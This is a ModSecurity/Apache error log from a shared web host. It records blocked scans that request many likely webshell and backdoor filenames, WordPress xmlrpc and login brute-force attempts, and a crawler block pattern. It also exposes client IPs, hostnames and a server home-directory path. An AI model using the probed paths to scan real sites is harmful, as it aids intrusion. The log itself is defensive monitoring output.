[Tue May 26 15:01:33.842606 2026] [security2:error] [pid 662057:tid 662204] [client 4.193.189.92:7388] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.com"] [uri "/root.php"] [unique_id "ahVodfT3lMm9tGFVg9RpjgAAARs"]
[Tue May 26 15:01:34.224367 2026] [security2:error] [pid 662057:tid 662271] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVodfT3lMm9tGFVg9RpiwAAAV4"]
[Tue May 26 15:01:34.641828 2026] [security2:error] [pid 662057:tid 662299] [client 4.193.189.92:3430] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.com"] [uri "/r.php"] [unique_id "ahVodvT3lMm9tGFVg9RprgAAAXo"]
[Tue May 26 15:01:35.356740 2026] [security2:error] [pid 662057:tid 662311] [client 136.243.220.209:1849] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 209.220.243.136.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.glorodrc.com"] [uri "/index.php"] [unique_id "ahVod_T3lMm9tGFVg9RpuwAAAYY"]
[Tue May 26 15:01:35.465049 2026] [security2:error] [pid 662057:tid 662252] [client 4.193.189.92:11015] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.com"] [uri "/sid3.php"] [unique_id "ahVod_T3lMm9tGFVg9RpxAAAAUs"]
[Tue May 26 15:01:36.055370 2026] [security2:error] [pid 662057:tid 662249] [client 57.141.2.61:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVod_T3lMm9tGFVg9RpxwAAAUg"]
[Tue May 26 15:01:36.168872 2026] [security2:error] [pid 662057:tid 662281] [client 160.119.76.55:35942] ModSecurity: Access denied with code 406 (phase 2). Match of "rx [.](png|jpeg|jpg|tiff|bmp|gif|webp|heif|svg|raw|ico|ppm|pgm|pbm|exr|nef|dng|cr2|orf|arw|pef|sr2|raf|kdc|indd|ai|eps|pdf|psd|tga|hdr|j2k|jpf|jp2|pspimage|cut|icns|webm|bpg|avif|heic|fpx|hdri|hdp|yuv|sgi|xpm|svgz)$" against "REQUEST_FILENAME" required. [file "/opt/mod_security/hg_rules.conf"] [line "842"] [id "900095"] [msg "Bad UA :: Fake Mozilla Agent"] [hostname "162.215.241.212"] [uri "/"] [unique_id "ahVoePT3lMm9tGFVg9Rp2AAAAWg"]
[Tue May 26 15:01:36.320516 2026] [security2:error] [pid 662057:tid 662279] [client 4.193.189.92:6017] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.com"] [uri "/ss.php"] [unique_id "ahVoePT3lMm9tGFVg9Rp3gAAAWY"]
[Tue May 26 15:01:37.118156 2026] [security2:error] [pid 662057:tid 662256] [client 4.193.189.92:2165] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.com"] [uri "/sts.php"] [unique_id "ahVoefT3lMm9tGFVg9Rp9wAAAU8"]
[Tue May 26 15:01:37.921605 2026] [security2:error] [pid 662057:tid 662291] [client 4.193.189.92:11615] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.com"] [uri "/shell.php"] [unique_id "ahVoefT3lMm9tGFVg9RqDAAAAXI"]
[Tue May 26 15:01:38.738233 2026] [security2:error] [pid 662057:tid 662209] [client 4.193.189.92:8252] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.com"] [uri "/setup-config.php"] [unique_id "ahVoevT3lMm9tGFVg9RqLQAAASA"]
[Tue May 26 15:01:38.760751 2026] [security2:error] [pid 662057:tid 662201] [client 57.141.2.13:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVoevT3lMm9tGFVg9RqHgAAARg"]
[Tue May 26 15:01:39.254340 2026] [security2:error] [pid 662057:tid 662196] [client 136.243.220.209:43762] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 209.220.243.136.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.glorodrc.com"] [uri "/index.php"] [unique_id "ahVoe_T3lMm9tGFVg9RqPAAAARM"]
[Tue May 26 15:01:40.036963 2026] [security2:error] [pid 662057:tid 662270] [client 4.193.189.92:6119] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.com"] [uri "/t.php"] [unique_id "ahVofPT3lMm9tGFVg9RqSwAAAV0"]
[Tue May 26 15:01:40.808089 2026] [security2:error] [pid 662057:tid 662074] [remote 74.7.241.58:46774] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahVofPT3lMm9tGFVg9RqYgABiBA"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/public_html/mosykay.com/account/resources/lang/sv
[Tue May 26 15:01:40.836973 2026] [security2:error] [pid 662057:tid 662247] [client 4.193.189.92:10503] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.com"] [uri "/up.php"] [unique_id "ahVofPT3lMm9tGFVg9RqZAAAAUY"]
[Tue May 26 15:01:41.690562 2026] [security2:error] [pid 662057:tid 662212] [client 4.193.189.92:5436] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.com"] [uri "/ultra.php"] [unique_id "ahVoffT3lMm9tGFVg9RqeAAAASM"]
[Tue May 26 15:01:41.837110 2026] [security2:error] [pid 662057:tid 662293] [client 61.246.190.186:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "www.samayikprasanga.in"] [uri "/cgi-sys/404.html"] [unique_id "ahVoffT3lMm9tGFVg9RqfgAAAXQ"]
[Tue May 26 15:01:41.837856 2026] [security2:error] [pid 662057:tid 662198] [client 61.246.190.186:61637] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "www.samayikprasanga.in"] [uri "/favicon.ico"] [unique_id "ahVoffT3lMm9tGFVg9RqfAAAARU"]
[Tue May 26 15:01:42.161839 2026] [security2:error] [pid 662057:tid 662284] [client 61.246.190.186:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "www.samayikprasanga.in"] [uri "/cgi-sys/404.html"] [unique_id "ahVofvT3lMm9tGFVg9RqjwAAAWs"]
[Tue May 26 15:01:42.162336 2026] [security2:error] [pid 662057:tid 662260] [client 61.246.190.186:61637] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "www.samayikprasanga.in"] [uri "/favicon.ico"] [unique_id "ahVofvT3lMm9tGFVg9RqjQAAAVM"]
[Tue May 26 15:01:42.162798 2026] [security2:error] [pid 662057:tid 662279] [client 154.161.32.97:57091] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 97.32.161.154.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "lmialumni.org"] [uri "/xmlrpc.php"] [unique_id "ahVofvT3lMm9tGFVg9RqgwAAAWY"]
[Tue May 26 15:01:42.162924 2026] [security2:error] [pid 662057:tid 662279] [client 154.161.32.97:57091] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "lmialumni.org"] [uri "/xmlrpc.php"] [unique_id "ahVofvT3lMm9tGFVg9RqgwAAAWY"]
[Tue May 26 15:01:42.344092 2026] [security2:error] [pid 662057:tid 662277] [client 57.141.2.56:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVoffT3lMm9tGFVg9RqgQAAAWQ"]
[Tue May 26 15:01:42.462553 2026] [security2:error] [pid 662057:tid 662208] [client 4.193.189.92:4496] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.com"] [uri "/vv.php"] [unique_id "ahVofvT3lMm9tGFVg9RqmAAAAR8"]
[Tue May 26 15:01:43.236170 2026] [security2:error] [pid 662057:tid 662226] [client 4.193.189.92:9530] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.com"] [uri "/V5.php"] [unique_id "ahVof_T3lMm9tGFVg9RqpgAAATE"]
[Tue May 26 15:01:43.290372 2026] [security2:error] [pid 662057:tid 662193] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVofvT3lMm9tGFVg9RqpAAAARA"]
[Tue May 26 15:01:43.424324 2026] [security2:error] [pid 662057:tid 662251] [client 136.243.220.209:64834] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 209.220.243.136.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.glorodrc.com"] [uri "/index.php"] [unique_id "ahVof_T3lMm9tGFVg9RqsQAAAUo"]
[Tue May 26 15:01:43.620685 2026] [proxy:error] [pid 662057:tid 662257] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 15:01:43.620772 2026] [proxy_http:error] [pid 662057:tid 662257] [client 198.235.24.97:65462] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 15:01:43.621376 2026] [proxy:error] [pid 662057:tid 662257] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 15:01:43.621441 2026] [proxy_http:error] [pid 662057:tid 662257] [client 198.235.24.97:65462] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 15:01:44.065384 2026] [security2:error] [pid 662057:tid 662269] [client 4.193.189.92:8192] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.com"] [uri "/wp-user.php"] [unique_id "ahVogPT3lMm9tGFVg9RqvgAAAVw"]
[Tue May 26 15:01:44.787366 2026] [security2:error] [pid 662057:tid 662216] [client 64.233.173.100:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVogPT3lMm9tGFVg9RqyAAAASc"]
[Tue May 26 15:01:44.907487 2026] [security2:error] [pid 662057:tid 662189] [client 4.193.189.92:6058] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.com"] [uri "/wp-blog.php"] [unique_id "ahVogPT3lMm9tGFVg9Rq3QAAAQw"]
[Tue May 26 15:01:45.675462 2026] [security2:error] [pid 662057:tid 662253] [client 57.141.2.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVogfT3lMm9tGFVg9Rq7gAAAUw"]
[Tue May 26 15:01:45.682357 2026] [security2:error] [pid 662057:tid 662190] [client 4.193.189.92:10890] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.com"] [uri "/wp.php"] [unique_id "ahVogfT3lMm9tGFVg9Rq9wAAAQ0"]
[Tue May 26 15:01:45.896165 2026] [security2:error] [pid 662057:tid 662302] [client 154.161.32.97:57092] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 97.32.161.154.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "lmialumni.org"] [uri "/xmlrpc.php"] [unique_id "ahVogfT3lMm9tGFVg9Rq-wAAAX0"]
[Tue May 26 15:01:45.896301 2026] [security2:error] [pid 662057:tid 662302] [client 154.161.32.97:57092] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "lmialumni.org"] [uri "/xmlrpc.php"] [unique_id "ahVogfT3lMm9tGFVg9Rq-wAAAX0"]
[Tue May 26 15:01:46.595410 2026] [security2:error] [pid 662057:tid 662187] [client 4.193.189.92:3888] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.com"] [uri "/worksec.php"] [unique_id "ahVogvT3lMm9tGFVg9RrCgAAAQo"]
[Tue May 26 15:01:46.929960 2026] [security2:error] [pid 662057:tid 662189] [client 136.243.220.209:64516] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 209.220.243.136.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.glorodrc.com"] [uri "/index.php"] [unique_id "ahVogvT3lMm9tGFVg9RrGQAAAQw"]
[Tue May 26 15:01:47.426050 2026] [security2:error] [pid 662057:tid 662283] [client 4.193.189.92:3857] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.com"] [uri "/wp-themes.php"] [unique_id "ahVog_T3lMm9tGFVg9RrKQAAAWo"]
[Tue May 26 15:01:47.820333 2026] [security2:error] [pid 662057:tid 662272] [client 57.141.2.70:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVog_T3lMm9tGFVg9RrKAAAAV8"]
[Tue May 26 15:01:48.030968 2026] [security2:error] [pid 662057:tid 662260] [client 114.119.150.168:34811] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "glorodavionics.com"] [uri "/"] [unique_id "ahVohPT3lMm9tGFVg9RrSAAAAVM"], referer: http://glorodavionics.com/index.php?route=product/product&manufacturer_id=11&product_id=82&page=4
[Tue May 26 15:01:48.234317 2026] [security2:error] [pid 662057:tid 662300] [client 4.193.189.92:9518] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.com"] [uri "/wp-signin.php"] [unique_id "ahVohPT3lMm9tGFVg9RrSwAAAXs"]
[Tue May 26 15:01:48.976883 2026] [security2:error] [pid 662057:tid 662275] [client 4.193.189.92:6707] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.com"] [uri "/wp-blog-header.php"] [unique_id "ahVohPT3lMm9tGFVg9RrYgAAAWI"]
[Tue May 26 15:01:50.233234 2026] [security2:error] [pid 662057:tid 662269] [client 57.141.2.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVohfT3lMm9tGFVg9RrqAAAAVw"]
[Tue May 26 15:01:50.302132 2026] [security2:error] [pid 662057:tid 662223] [client 114.119.159.16:38265] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.jhonweb.com"] [uri "/wp-content/uploads/citygamer-header-400x284.jpg"] [unique_id "ahVohvT3lMm9tGFVg9RrtQAAAS4"], referer: https://www.jhonweb.com/project_category/web-corporativa
[Tue May 26 15:01:50.434126 2026] [security2:error] [pid 662057:tid 662288] [client 4.193.189.92:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "doyecpa.com"] [uri "/index.php"] [unique_id "ahVohfT3lMm9tGFVg9RrowAAAW8"]
[Tue May 26 15:01:50.920897 2026] [security2:error] [pid 662057:tid 662293] [client 4.193.189.92:1112] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.com"] [uri "/ws.php"] [unique_id "ahVohvT3lMm9tGFVg9RrywAAAXQ"]
[Tue May 26 15:01:51.535176 2026] [security2:error] [pid 662057:tid 662261] [client 154.161.32.97:57093] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 97.32.161.154.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "lmialumni.org"] [uri "/xmlrpc.php"] [unique_id "ahVoh_T3lMm9tGFVg9Rr2QAAAVQ"]
[Tue May 26 15:01:51.535281 2026] [security2:error] [pid 662057:tid 662261] [client 154.161.32.97:57093] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "lmialumni.org"] [uri "/xmlrpc.php"] [unique_id "ahVoh_T3lMm9tGFVg9Rr2QAAAVQ"]
[Tue May 26 15:01:51.667207 2026] [security2:error] [pid 662057:tid 662268] [client 4.193.189.92:10907] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.com"] [uri "/wsa.php"] [unique_id "ahVoh_T3lMm9tGFVg9Rr4QAAAVs"]
[Tue May 26 15:01:52.356966 2026] [security2:error] [pid 662057:tid 662251] [client 37.139.53.229:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVoiPT3lMm9tGFVg9Rr8QAAAUo"], referer: https://www.anujtradingco.com/
[Tue May 26 15:01:52.460577 2026] [security2:error] [pid 662057:tid 662272] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVoiPT3lMm9tGFVg9Rr7QAAAV8"]
[Tue May 26 15:01:52.488552 2026] [security2:error] [pid 662057:tid 662280] [client 4.193.189.92:9557] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.com"] [uri "/w.php"] [unique_id "ahVoiPT3lMm9tGFVg9Rr_AAAAWc"]
[Tue May 26 15:01:52.701242 2026] [security2:error] [pid 662057:tid 662064] [remote 54.38.29.86:44662] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 86.29.38.54.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahVoiPT3lMm9tGFVg9Rr_gABawY"]
[Tue May 26 15:01:53.141860 2026] [security2:error] [pid 662057:tid 662196] [client 37.139.53.229:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVoifT3lMm9tGFVg9RsDwAAARM"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1418267&moderation-hash=9be30dabce180487f5f9cabe7d60938d
[Tue May 26 15:01:53.297715 2026] [security2:error] [pid 662057:tid 662256] [client 4.193.189.92:6205] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.com"] [uri "/x.php"] [unique_id "ahVoifT3lMm9tGFVg9RsFAAAAU8"]
[Tue May 26 15:01:54.117224 2026] [security2:error] [pid 662057:tid 662217] [client 4.193.189.92:10933] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.com"] [uri "/xx.php"] [unique_id "ahVoivT3lMm9tGFVg9RsLgAAASg"]
[Tue May 26 15:01:54.551359 2026] [security2:error] [pid 662057:tid 662221] [client 57.141.2.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVoivT3lMm9tGFVg9RsMQAAASw"]
[Tue May 26 15:01:55.126973 2026] [security2:error] [pid 662057:tid 662238] [client 4.193.189.92:6046] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.com"] [uri "/xmlrpc.php"] [unique_id "ahVoivT3lMm9tGFVg9RsRwAAAT0"]
[Tue May 26 15:01:55.508389 2026] [security2:error] [pid 662057:tid 662191] [client 154.161.32.97:57095] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 97.32.161.154.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "lmialumni.org"] [uri "/xmlrpc.php"] [unique_id "ahVoi_T3lMm9tGFVg9RsYQAAAQ4"]
